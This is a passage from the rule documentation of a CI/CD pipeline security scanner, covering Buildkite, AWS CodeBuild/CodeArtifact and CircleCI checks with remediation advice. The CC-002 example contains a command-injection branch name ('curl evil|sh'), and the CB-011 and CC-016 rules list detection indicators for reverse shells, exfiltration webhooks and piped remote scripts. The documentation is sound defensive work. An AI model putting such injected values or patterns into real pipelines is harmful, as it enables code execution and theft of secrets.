Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection fires on the canonical bypass flags across curl, wget, git, npm, pip, gcloud, and openssl. The check is deliberately conservative: partial-word matches (--insecure-protocols) are excluded.

Recommendation. Drop curl -k / --insecure, wget --no-check-certificate, git -c http.sslVerify=false, and pip install --trusted-host. If a CA isn't trusted, install it into the agent's trust store (update-ca-certificates) rather than disabling validation pipeline-wide. A compromised intermediate that strips TLS gets a free hand with every fetch the step performs.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BK-008 in the Buildkite provider.

BK-009: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts can't be verified downstream; a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools, matching the shared signing-token catalog used by the other CI packs.

Recommendation. Add a signing step: install cosign once (brew install cosign in the agent image, or a cosign-install plugin) and call cosign sign --yes <ref> after the build. For container images pushed to ECR / GCR / GHCR, the same call signs by digest. Publish the signature alongside the artifact and verify it at consumption time.

Source: BK-009 in the Buildkite provider.

BK-010: No SBOM generated for build artifacts MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer "did this CVE ship?" for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool.

Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > sbom.json runs in any standard agent image; cyclonedx-cli and cdxgen are alternative producers. Upload the SBOM via buildkite-agent artifact upload so downstream consumers (and incident-response tooling) can match deployed artifacts to the components they were built from.

Source: BK-010 in the Buildkite provider.

BK-011: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. A leaked signing key can forge identity, and a compromised build environment can forge provenance; the SLSA L3 non-falsifiability guarantee needs both controls in place. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance).

Recommendation. Run cosign attest --predicate slsa.json (or the SLSA-framework generator from a build-time step) after the build completes. The predicate records the build inputs and the agent that produced the artifact. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.

Source: BK-011 in the Buildkite provider.

BK-012: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM: it answers "does this artifact ship a known CVE?" rather than "can we verify what it is?". Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, anchore, dependency-check, checkov, semgrep.

Recommendation. Add a vulnerability scanner: trivy fs . for source / filesystem, trivy image <ref> for container images, grype or snyk for either. Add npm audit / pip-audit for language-specific dependency audits. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
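One way to wire this into a Buildkite step, assuming trivy is installed on the agent (the severity threshold is a policy choice, not a scanner requirement):

```yaml
steps:
  - label: ":mag: vulnerability scan"
    command:
      # non-zero exit on HIGH/CRITICAL findings makes the step fail,
      # so a regression blocks the merge instead of shipping
      - "trivy fs --exit-code 1 --severity HIGH,CRITICAL ."
```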

Source: BK-012 in the Buildkite provider.

BK-013: Deploy step has no branches: filter MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship-it, release, promote, rollout, helm upgrade, kubectl apply, terraform apply, aws ecs update-service, aws lambda update-function-code, gcloud run deploy). The check passes when the step declares branches: with at least one literal branch name (a wildcard like "*" is treated as an explicit opt-out, not a passing filter, and still trips). The pipeline-level default also counts: a top-level branches: declaration propagates to every step.

Recommendation. Add branches: "main release/*" (or your release branch glob) to every deploy step. Buildkite skips the step on any other branch, which prevents a feature-branch PR from accidentally promoting code to production. Combine with BK-007's manual block: so a release branch plus a human approval is the path to deploy.
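Combining both controls, a deploy step might look like this sketch (the deploy script path is illustrative):

```yaml
steps:
  # human approval gate (BK-007): only unblocks on release branches
  - block: ":rocket: Approve production deploy"
    branches: "main release/*"
  # the deploy itself is also branch-filtered (BK-013)
  - label: "deploy"
    command: "./scripts/deploy.sh"
    branches: "main release/*"
```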

Known false positives.

  • Trunk-based teams that branch-protect main and treat every merge as a deploy candidate may not use branches:. Add branches: main to make the policy explicit, or ignore BK-013 in .pipeline-check-ignore.yml with a scope of main-only repos.

Source: BK-013 in the Buildkite provider.

BK-014: Step commands run unpinned package installs MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection reuses the cross-provider primitives PKG_INSECURE_RE and PKG_NO_LOCKFILE_RE from checks/base.py. The same rule pack already exists for GHA (GHA-021 / GHA-022), GitLab (GL-021 / GL-022), Bitbucket, Azure DevOps, Jenkins, CircleCI, Cloud Build, and Drone; Buildkite was the remaining gap, and this check closes it.

Insecure variants (PKG_INSECURE_RE): pip --index-url http://, pip --trusted-host, npm --registry http://, gem --source http://, nuget --Source http://, cargo --index http://. Lockfile-bypass variants (PKG_NO_LOCKFILE_RE): npm install (should be npm ci), bare pip install <pkg> without -r or --require-hashes, yarn install without --frozen-lockfile, bundle install without --frozen, cargo install, go install without an @vN.N pin, poetry install without --no-update.

Recommendation. Pin every package install to a lockfile or a checksum-verified version. npm ci (not npm install), yarn install --frozen-lockfile, pip install -r requirements.txt --require-hashes, bundle install --frozen. Don't use --trusted-host / --no-verify / a non-HTTPS index URL — those bypass TLS or trust validation entirely (BK-008 covers the TLS subset; this rule covers the lockfile subset).
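In Buildkite terms, a lockfile-enforcing install step looks like this sketch (which commands you need depends on your stack):

```yaml
steps:
  - label: ":hammer: install dependencies"
    command:
      # npm ci installs exactly what package-lock.json pins; npm install would not
      - "npm ci"
      # pip refuses any package whose hash is missing from the requirements file
      - "pip install -r requirements.txt --require-hashes"
```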

Known false positives.

  • Bootstrap-stage installs that intentionally pull latest (apt-get install -y curl for a tooling image rebuild) sometimes legitimately bypass the lockfile. Suppress via ignore-file scoped to the specific step label when this is the deliberate shape; the broader pinning policy still covers the rest of the pipeline.

Source: BK-014 in the Buildkite provider.

BK-015: agents map interpolates attacker-controllable Buildkite variable HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-7 Insecure System Configuration.

How this is detected. Buildkite uses an agents: map to route a step to a specific runner pool. Both the top-level agents: and the per-step override are scanned. Detection mirrors BK-003's tainted-variable list ($BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, $BUILDKITE_BUILD_AUTHOR*, $BUILDKITE_COMMIT). The pattern matches what GHA-036, GL-032, JF-032, ADO-030, and CC-031 already enforce on the other CI providers; closes parity for Buildkite.

Quote-state aware in the same way BK-003 is: "$BUILDKITE_BRANCH" doesn't fire (Buildkite doesn't shell-eval the agents map anyway, but the value still substitutes); only the unquoted single-token interpolation does.

Recommendation. Pin every agents: map entry to a static literal that matches your runner targeting policy. queue: linux-amd64 or os: linux is fine; queue: $BUILDKITE_BRANCH is not, because the pusher can route their build to whichever agent pool they want, including a privileged pool reserved for the deploy step. Production runner pools should also carry a tag the agent itself enforces (e.g. buildkite-agent start --tags 'queue=production' plus a queue-allow-list on the API token), so the rule is one layer of a defense-in-depth posture.
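A sketch of static agent targeting (queue names are illustrative; match them to your own runner pools):

```yaml
# pipeline-level default: a static literal, never a Buildkite variable
agents:
  queue: linux-amd64

steps:
  - label: "deploy"
    command: "./scripts/deploy.sh"
    # per-step override is also pinned; queue: $BUILDKITE_BRANCH would let
    # the pusher route this build onto any pool they can name
    agents:
      queue: production
```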

Known false positives.

  • Some teams use a static prefix plus a CI-controlled tail (queue: build-$BUILDKITE_PIPELINE_SLUG) to share an agent pool across pipelines. BUILDKITE_PIPELINE_SLUG is not pusher-controllable so it isn't on the tainted list, but if your team has its own conventions for trusted Buildkite vars, suppress on the specific step.

Source: BK-015 in the Buildkite provider.

CA-000: CodeArtifact API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CA-000 in the AWS provider.

CA-001: CodeArtifact domain not encrypted with customer KMS CMK MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. AWS-owned encryption (the default alias/aws/codeartifact key) keeps the key policy under AWS's control, not yours. That's fine for confidentiality but means cross-account auditability of every Decrypt event lives with AWS, and you can't revoke or scope key access without recreating the domain. A customer-managed CMK puts both controls back in your hands.

Recommendation. Recreate the CodeArtifact domain with an encryption-key argument pointing at a customer-managed CMK. Domain encryption is set at creation and cannot be changed after.

Source: CA-001 in the AWS provider.

CA-002: CodeArtifact repository has a public external connection HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. An external connection to public:npmjs / public:pypi / public:nuget / public:maven-central fetches packages from the public registry on first resolution. A typo-squat (request vs requests) or a compromised upstream lands in the cache the first time anyone names it; every subsequent build pulls the cached substitute. A pull-through cache repository governed by an explicit allow-list closes this risk shape.

Recommendation. Route public package consumption through a pull-through cache repository governed by an allow-list of package names, and point build-time repos at that cache rather than directly at public:npmjs/public:pypi. Unscoped public upstreams expose builds to dependency-confusion and typosquatting attacks.

Source: CA-002 in the AWS provider.

CA-003: CodeArtifact domain policy allows cross-account wildcard CRITICAL

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A wildcard-principal Allow on a CodeArtifact domain lets any AWS account reach the domain's permissions surface. The exact damage depends on the action set, but at minimum it lets external accounts read package names and versions, which is enough for typosquat-against-private-package attacks. An aws:PrincipalOrgID condition restores an org-level boundary without enumerating individual accounts.

Recommendation. Remove Allow statements with Principal: '*' from every CodeArtifact domain permissions policy, or restrict them with an aws:PrincipalOrgID condition so only accounts in your org can consume packages from the domain.

Source: CA-003 in the AWS provider.

CA-004: CodeArtifact repo policy grants codeartifact:* with Resource '*' HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. codeartifact:* on Resource: '*' collapses the entire repository's authority into one grant: the holder can read, write, delete, dispose, and re-publish every package. Even for a service principal that nominally only consumes packages, the grant lets a compromise of that consumer rewrite every dependency the team relies on.

Recommendation. Scope Allow statements to specific codeartifact: actions (e.g. codeartifact:ReadFromRepository) and to specific package-group ARNs. Wildcard action + wildcard resource is the classic over-broad grant that lets a consumer also publish.

Source: CA-004 in the AWS provider.

CB-000: CodeBuild API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: CB-000 in the AWS provider.

CB-001: Secrets in plaintext environment variables CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Flags a plaintext env var when either (a) its name matches a secret-like pattern (PASSWORD, TOKEN, API_KEY, ...) or (b) its value matches a known credential shape (AKIA/ASIA access keys, GitHub tokens, Slack xox* tokens, JWTs). Plaintext values are visible in the AWS console, CloudTrail, and build logs to anyone with read access.

Recommendation. Move secrets to AWS Secrets Manager or SSM Parameter Store and reference them using type SECRETS_MANAGER or PARAMETER_STORE in the CodeBuild environment variable configuration.
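In buildspec terms, a Secrets Manager reference looks like this (the secret name, JSON key, and build command are illustrative):

```yaml
version: 0.2
env:
  secrets-manager:
    # resolved at build time from Secrets Manager; the value never appears
    # in the project configuration, the console, or CloudTrail
    DB_PASSWORD: "prod/app/db:password"
phases:
  build:
    commands:
      - ./scripts/build.sh
```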

Source: CB-001 in the AWS provider.

CB-002: Privileged mode enabled HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Privileged mode grants the build container root access to the host's Docker daemon. A compromised build can escape the container or tamper with the host. Only flip this on for real Docker-in-Docker workloads and keep the buildspec under branch-protected review.

Recommendation. Disable privileged mode unless the project explicitly requires Docker-in-Docker builds. If required, ensure the buildspec is tightly controlled, peer-reviewed, and sourced from a trusted repository with branch protection.

Source: CB-002 in the AWS provider.

CB-003: Build logging not enabled MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. A CodeBuild project with neither CloudWatch Logs nor S3 logging enabled leaves no durable record of what the build did. The CodeBuild console shows the last execution's logs for a short retention window, but anything older, and any automated review of historical activity during incident response, is gone.

Recommendation. Enable CloudWatch Logs or S3 logging in the CodeBuild project configuration to maintain a durable audit trail of all build activity.

Source: CB-003 in the AWS provider.

CB-004: No build timeout configured LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. A CodeBuild project at AWS's 480-minute maximum is rarely deliberate. Without a tighter ceiling, a runaway test loop, a fork-PR cryptomining payload, or a build that hangs on stdin keeps the build host (and its IAM role) live for the full eight hours, racking up cost and extending the compromise window.

Recommendation. Set a build timeout appropriate for your expected build duration (typically 15–60 minutes) to limit the blast radius of a runaway or abused build.

Source: CB-004 in the AWS provider.

CB-005: Outdated managed build image MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Only AWS-managed aws/codebuild/standard:N.0 images are version-checked. Custom or third-party images pass here; CB-009 handles the separate concern of tag vs digest pinning for custom images.

Recommendation. Update the CodeBuild environment image to aws/codebuild/standard:7.0 or later to ensure the build environment receives the latest security patches.

Known false positives.

  • One version behind the current aws/codebuild/standard is a hygiene warning, not a production issue, and defaults to MEDIUM confidence. The rule emits HIGH only when the project is two or more versions behind. Custom or third-party images are not version-checked here; CB-009 handles tag-vs-digest pinning for those.

Source: CB-005 in the AWS provider.

CB-006: CodeBuild source auth uses long-lived token HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. OAUTH / PERSONAL_ACCESS_TOKEN / BASIC_AUTH source credentials are stored long-lived on the account and used by every CodeBuild project that points at the SCM provider. Rotating the upstream PAT requires manual re-credentialing here too. CodeConnections (CodeStar) is the AWS-managed alternative with token refresh and revocation.

Recommendation. Switch to an AWS CodeConnections (CodeStar) connection and reference it from the source configuration. Delete any stored source credentials of type OAUTH, PERSONAL_ACCESS_TOKEN, or BASIC_AUTH via delete_source_credentials.

Source: CB-006 in the AWS provider.

CB-007: CodeBuild webhook has no filter group MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A CodeBuild webhook with no filter groups fires on every push and every PR from any actor, including fork PRs from outside the org. Anyone able to open a PR triggers the build with whatever IAM authority the project's role carries. Filter groups (branch + actor + event type) are the gate.

Recommendation. Define filter groups restricting triggers to specific branches, actors, and event types.

Source: CB-007 in the AWS provider.

CB-008: CodeBuild buildspec is inline (not sourced from a protected repo) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. An inline buildspec (source.buildspec set to YAML text, or an S3 URL) bypasses the protections that cover your source code. A user with codebuild:UpdateProject can rewrite the build commands without touching the repository: no PR review, no branch protection, no audit of what changed. Store buildspec.yml in the repo instead.

Recommendation. Remove the inline buildspec and store buildspec.yml in the source repository under branch protection. Anyone with codebuild:UpdateProject can silently rewrite an inline buildspec; repository-sourced buildspecs inherit the repo's review and protection controls.

Source: CB-008 in the AWS provider.

CB-009: CodeBuild image not pinned by digest MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. CodeBuild pulls the environment image on every build. A tag pointer can be moved by whoever controls the registry; a digest cannot. AWS-managed aws/codebuild/... images are exempt. Those are covered by CB-005 and are not part of the tag-mutation threat model.

Recommendation. Pin custom CodeBuild images by @sha256:<digest>. Tag-based references (:latest, :1.2.3) can be silently overwritten to point at a malicious layer that is pulled on the next build.

Source: CB-009 in the AWS provider.

CB-010: CodeBuild webhook allows fork-PR builds without actor filtering HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GitHub/Bitbucket webhook filter groups that fire on pull-request events will build forks by default. Because CodeBuild runs with the project's own IAM role (not the PR author's), a fork PR can execute arbitrary code with CI privileges and exfiltrate secrets. Restrict to known contributors with an ACTOR_ACCOUNT_ID pattern group.

Recommendation. Add an ACTOR_ACCOUNT_ID filter pattern to every webhook filter group that accepts PULL_REQUEST_CREATED / PULL_REQUEST_UPDATED / PULL_REQUEST_REOPENED, or remove those PR event types. Without actor filtering, any fork can trigger a build that runs with the project's service role.

Source: CB-010 in the AWS provider.

CB-011: CodeBuild buildspec contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Scans the source.buildspec text on every CodeBuild project for concrete attack indicators: reverse shells, base64-decoded execution, miner binaries/pools, Discord/Telegram webhooks, credential-dump pipes, audit-erasure commands. CB-011 is CRITICAL by design: a true positive is evidence of compromise, not a hygiene improvement. Repo-sourced buildspecs (not inline) return NOT APPLICABLE because the text isn't visible to the scanner; CB-008 already flags the inline form as a governance gap.

Recommendation. Treat as a potential compromise. Identify which principal or pipeline ran the CodeBuild project recently, rotate its service role's credentials, audit CloudTrail for outbound activity to the matched hosts, and, if an inline buildspec is in use (CB-008), enforce repo-sourced buildspecs under branch protection so the next malicious edit requires a PR.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: CB-011 in the AWS provider.

CC-001: Orb not pinned to exact semver HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Orb references in the orbs: block must include an @x.y.z suffix to lock a specific version. References without @, with @volatile, or with only a major (@1) or major.minor (@5.1) version float and can silently pull in malicious updates.

Recommendation. Pin every orb to an exact semver version (circleci/node@5.1.0). Floating references like @volatile, @1, or bare names without @ resolve to whatever is latest at build time, allowing a compromised orb update to execute in the pipeline.
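For example, in the orbs: block (the orb name mirrors the one from the recommendation):

```yaml
orbs:
  # exact semver pin — passes the check
  node: circleci/node@5.1.0
  # each of these would fire: no @, @volatile, and a floating major.minor
  # node: circleci/node
  # node: circleci/node@volatile
  # node: circleci/node@5.1
```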

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-001 in the CircleCI provider.

CC-002: Script injection via untrusted environment variable HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. CircleCI exposes environment variables like $CIRCLE_BRANCH, $CIRCLE_TAG, and $CIRCLE_PR_NUMBER that are controlled by the event source (branch name, tag, PR). Interpolating them unquoted into run: commands allows shell injection via specially crafted branch or tag names.

Recommendation. Do not interpolate attacker-controllable environment variables (CIRCLE_BRANCH, CIRCLE_TAG, CIRCLE_PR_NUMBER, etc.) directly into shell commands. Pass them through an intermediate variable and quote them, or use CircleCI pipeline parameters instead.
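Because $CIRCLE_BRANCH is a real environment variable (not textual substitution), shell quoting is enough to keep a crafted branch name as data. A sketch (image tag is illustrative):

```yaml
jobs:
  build:
    docker:
      - image: cimg/base:2024.01
    steps:
      - run:
          # quoted expansion: the branch name cannot be re-parsed as shell syntax,
          # so a branch named `x";curl evil|sh;"` stays an inert string
          command: echo "building branch ${CIRCLE_BRANCH}"
```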

Source: CC-002 in the CircleCI provider.

CC-003: Docker image not pinned by digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Docker images referenced in docker: blocks under jobs or executors must include an @sha256:... digest suffix. Tag-only references (:latest, :18) are mutable and can be replaced at any time by whoever controls the upstream registry.

Recommendation. Pin every Docker image to its sha256 digest: cimg/node:18@sha256:abc123.... Tags like :latest or :18 are mutable, a registry compromise or upstream push silently replaces the image content.
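A sketch of the pinned form (the digest below is a placeholder; substitute the one the tag currently resolves to, e.g. from `docker inspect`):

```yaml
jobs:
  test:
    docker:
      # tag kept for readability, digest is what actually pins the content
      - image: "cimg/node:18@sha256:<digest-you-verified>"
```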

Source: CC-003 in the CircleCI provider.

CC-004: Secret-like environment variable not managed via context MEDIUM

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Jobs that declare environment variables with secret-looking names (containing PASSWORD, TOKEN, SECRET, or API_KEY) in inline environment: blocks bypass CircleCI's context restrictions; security groups, OIDC claims, and audit logs are only enforced when secrets live in contexts.

Recommendation. Move secret-like variables (PASSWORD, TOKEN, SECRET, API_KEY) into a CircleCI context and reference the context in the workflow job configuration. Contexts support security groups and audit logging that inline environment: blocks lack.

Source: CC-004 in the CircleCI provider.

CC-005: AWS auth uses long-lived access keys in environment block MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS access keys declared directly in a job's environment: block are visible to anyone who can read the config. They cannot be rotated automatically and remain valid until manually revoked. OIDC-based federation yields short-lived credentials per build.

Recommendation. Remove AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the job environment: block. Use CircleCI's OIDC token with aws-cli/setup orb's role-based auth, or store credentials in a context with security group restrictions.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-005 in the CircleCI provider.

CC-006: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-framework, and notation-sign as signing tools.

Recommendation. Add a signing step to the pipeline, e.g. install cosign and run cosign sign, or use the sigstore CLI. Publish the signature alongside the artifact and verify it at consumption time.

Source: CC-006 in the CircleCI provider.

CC-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.

Recommendation. Add an SBOM generation step: syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the build artifacts so consumers can ingest it into their vulnerability management pipeline.

Source: CC-007 in the CircleCI provider.

CC-008: Credential-shaped literal in config body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Every string in the config is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc.). A match means a secret was pasted into YAML, the value is visible in every fork and every build log and must be treated as compromised.

Recommendation. Rotate the exposed credential immediately. Move the value to a CircleCI project environment variable or a context and reference it via the variable name. For cloud access, prefer OIDC federation over long-lived keys.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed: if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: CC-008 in the CircleCI provider.

CC-009: Deploy job missing manual approval gate MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. In CircleCI, manual approval is implemented by adding a job with type: approval to the workflow and making the deploy job require it. Without this gate, any push to the triggering branch deploys immediately with no human review.

Recommendation. Add a type: approval job that precedes the deploy job in the workflow, and list it in the deploy job's requires:. This ensures a human must click Approve in the CircleCI UI before production changes roll out.
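The workflow shape looks like this sketch (job names are illustrative):

```yaml
workflows:
  release:
    jobs:
      - build
      # a human must click Approve in the CircleCI UI before deploy runs
      - hold-for-approval:
          type: approval
          requires: [build]
      - deploy:
          requires: [hold-for-approval]
```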

Source: CC-009 in the CircleCI provider.

CC-010: Self-hosted runner without ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The check looks for resource_class values containing 'self-hosted'; if found, it checks for 'ephemeral' in the value. Also checks for machine: true combined with a self-hosted resource class.

Recommendation. Configure self-hosted runners to tear down between jobs. Use a resource_class value that includes an ephemeral marker, or use CircleCI's machine executor with runner auto-scaling so each job gets a fresh environment.

Source: CC-010 in the CircleCI provider.

CC-011: No store_test_results step (test results not archived) LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Without store_test_results, test output is only available in the raw build log. Archiving test results enables CircleCI's test insights, timing-based splitting, and provides an audit trail that links each build to its test outcomes.

Recommendation. Add a store_test_results step to jobs that run tests. This archives test results in CircleCI for traceability, trend analysis, and debugging flaky tests.

Source: CC-011 in the CircleCI provider.

CC-012: Dynamic config via setup: true enables code injection MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. When setup: true is set at the top level, the config becomes a setup workflow. It generates the real pipeline config dynamically (typically via the circleci/continuation orb). An attacker who controls the setup job (e.g. via a malicious PR in a fork) can inject arbitrary config for all subsequent jobs, including deploy steps with production secrets.

Recommendation. If setup: true is required, restrict the setup job to a trusted branch filter and audit the generated config carefully. Ensure the continuation orb's configuration_path points to a checked-in file, not a dynamically generated one that could be influenced by PR content.

Source: CC-012 in the CircleCI provider.

CC-013: Deploy job in workflow has no branch filter MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without branch filters, a deploy job triggers on every branch push, including feature branches and forks. Restricting sensitive jobs to specific branches limits the blast radius of a compromised commit.

Recommendation. Add filters.branches.only to deploy-like workflow jobs so they only run on protected branches (e.g. main, release/*).
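For example (branch names are illustrative; CircleCI accepts regexes between slashes):

```yaml
workflows:
  release:
    jobs:
      - deploy:
          filters:
            branches:
              only:
                - main
                - /release\/.*/   # any release/* branch
```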

Source: CC-013 in the CircleCI provider.

CC-014: Job missing resource_class declaration MEDIUM

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Without an explicit resource_class, CircleCI assigns a default executor. Declaring the class documents the expected scope and prevents accidental use of larger (or self-hosted) executors that may have elevated privileges.

Recommendation. Add resource_class: to every job to explicitly control the executor size and capabilities. Use the smallest class that satisfies build requirements.

Source: CC-014 in the CircleCI provider.

CC-015: No no_output_timeout configured MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without no_output_timeout, a hung step can consume executor time indefinitely. Explicit timeouts cap cost and the window during which a compromised step has access to secrets and the build environment.

Recommendation. Add no_output_timeout: to long-running run steps, or set it at the job level. A reasonable default is 10-30 minutes. CircleCI's default of 10 minutes may be too long for some pipelines and absent for others.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-015 in the CircleCI provider.

CC-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a CircleCI config. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: CC-016 in the CircleCI provider.

CC-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a CircleCI config give the container full access to the runner, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-017 in the CircleCI provider.

CC-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a CircleCI config. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: CC-018 in the CircleCI provider.

CC-019: add_ssh_keys without fingerprint restriction HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

